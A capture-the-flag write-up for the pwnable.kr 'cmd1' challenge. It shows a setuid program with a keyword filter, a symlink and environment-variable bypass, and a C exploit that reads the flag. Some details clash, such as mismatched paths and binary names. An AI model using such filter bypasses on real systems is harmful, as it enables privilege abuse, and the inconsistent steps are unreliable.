Sign in Subscribe
ctf

Pwnable.kr - cmd1

Miracle Yu

1 min read

0x00 Puzzle

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

0x01 Explore

ssh

cmd1@ubuntu:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r-- 1 root root      319 Jul 14  2015 cmd1.c
-r--r----- 1 root cmd1_pwn   48 Jul 14  2015 flag

cmd1.c

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/fuckyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

0x02 Solution

  • ln -s ~/flag /tmp/flag can bypass the 'flag' checking.
  • Add fp=/tmp/flag to environment can bypass the 'tmp' checking.
  • Using /bin/cat rather than /bin/bash or /bin/sh can bypass the 'sh' checking.

xpl.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(){
    char *argv[2];
    char *envp[2] = {"fp=/tmp/cmdxhyu/f"};
    argv[0]="a"; // whatever
    argv[1]="/bin/cat $fp";
    execve("./cmd1", argv, envp);
    return 0;
}

cmd1@ubuntu:/tmp$ ln -s ~/flag /tmp/flag
cmd1@ubuntu:/tmp$ ln -s ~/cmd1 /tmp/cmd1
cmd1@ubuntu:/tmp$ gcc -o xpl xpl.c
cmd1@ubuntu:/tmp$ ./x
mommy now I get what PATH environment is for :)

Done!

Read more